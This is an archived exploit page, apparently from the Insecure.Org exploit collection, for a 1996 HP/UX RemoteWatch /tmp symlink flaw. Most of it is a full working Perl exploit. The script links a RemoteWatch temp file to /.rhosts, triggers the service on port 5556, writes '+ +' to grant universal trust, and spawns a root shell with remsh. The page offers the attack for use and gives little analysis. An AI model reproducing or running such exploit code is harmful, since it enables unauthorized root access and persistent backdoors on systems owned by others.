HP/UX Remote Watch hole

Summary
Description:Standard /tmp symlink exploit
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable , probably 9.x 10.x
Date:June 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/usr/bin/perl

# displays a problem with RemoteWatch use of /tmp to store filestuffs
# SOD - June 96

use Socket;
use FileHandle;

$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }

STDOUT->autoflush();

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

if (-f "/.rhosts") {
  print "/.rhosts exists!  Cannot spooge...\n";
  print "(but I can be used to make ANY root owned world writable file...)\n";
  exit;
  }


print "This program will attempt to put + + into /.rhosts\n";
system("rm -rf /tmp/iconTmpUpdate");
chop($host=`hostname`);
mkdir("/tmp/iconTmpUpdate",0777);
mkdir("/tmp/iconTmpUpdate/$host",0777);
chmod(0777,"/tmp/iconTmpUpdate","/tmp/iconTmpUpdate/$host");
symlink("/.rhosts","/tmp/iconTmpUpdate/$host/done")||die "$!: cannot symlink";

$port=5556;
shift(@ARGV);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $type, $len, $thataddr) = gethostbyname($host);
$that=pack('S n a4 x8', AF_INET, $port, $thataddr);

socket(S,PF_INET,SOCK_STREAM,$proto)|| die "socket: $!";
connect(S,$that) || die "connect: $!";
S->autoflush();

# 20 20 31 7a gives back a 0x6f(111) -- meaning WHAT exactly?
#print S h2cs("2020317a");

# 20 20 31 5a gives back 0 0 5 0xa(10) -- gah?
print S h2cs("202031");
print S chr(117);
print "Please wait";
while($c=getc(S)) {
  print ".";
  }
close(S);

$n=0;
while($n++<6) {
  print "\nOK...";
  last if (-f "/.rhosts");
  sleep 1;
  }
print "\n";
open(R,">>/.rhosts");
print R "+ +\n";
close(R);
print "Testing out your root shell...\n";
system("remsh $host -l root sh -i");
exit;

STDOUT->autoflush();

if ($child = fork) {
  while (<>) { print S; }
  sleep 3;
  do dokill();
  } else {
  while () { print; }
  }
close(S);
exit;


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault